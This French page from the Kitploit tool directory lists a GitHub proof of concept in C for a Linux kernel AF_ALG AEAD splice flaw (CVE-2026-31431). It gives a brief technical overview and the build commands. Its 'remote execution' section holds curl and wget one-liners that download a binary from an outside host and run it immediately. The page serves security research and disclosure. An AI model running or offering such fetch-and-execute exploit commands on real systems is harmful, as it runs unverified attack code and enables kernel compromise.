Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-31431 — Port C d’une preuve de concept exploitant une faille de logique splice AEAD AF_ALG du noyau Linux (CVE-2026-31431) à des fins de recherche pédagogique. | Kitploit
Outils/GitHubGitHub/offsecguy/cve-2026-31431
Analyse des VulnérabilitésExploitationExploitation de Binaires
GitHuboffsecguy/cve-2026-31431

CVE-2026-31431

Port C d’une preuve de concept exploitant une faille de logique splice AEAD AF_ALG du noyau Linux (CVE-2026-31431) à des fins de recherche pédagogique.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

copy.fail — primitive splice AF_ALG AEAD (CVE-2026-31431)

Aperçu

Ce projet est un portage en C du prototype Python original, par offsecguy.
Il exploite l'API crypto du noyau Linux (AF_ALG) en utilisant :

  • le mode AEAD authencesn(hmac(sha256),cbc(aes))
  • le drapeau MSG_MORE
  • l'appel système splice()

La technique achemine les données d'un descripteur de fichier en lecture seule à travers une socket crypto, en les traitant morceau par morceau.


⚙️ Compilation

Option 1 — musl (construction statique)

root@kitploit:~
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz

Option 2 — GCC statique

root@kitploit:~
gcc exp.c -o exp -lz -s -static

Option 3 — GCC dynamique

root@kitploit:~
gcc exp.c -o exp -lz -s

🚀 Exécution à distance

root@kitploit:~
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
root@kitploit:~
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp

⚠️ Remarques

  • Nécessite la prise en charge de AF_ALG par le noyau Linux
  • Utilise zlib pour la décompression
  • Conçu pour une interaction et une expérimentation de bas niveau avec la crypto du noyau

Avertissement

Ce code est fourni uniquement à des fins éducatives et de recherche.
Utilisez-le de manière responsable et uniquement sur des systèmes que vous êtes autorisé à tester.

Télécharger l’outil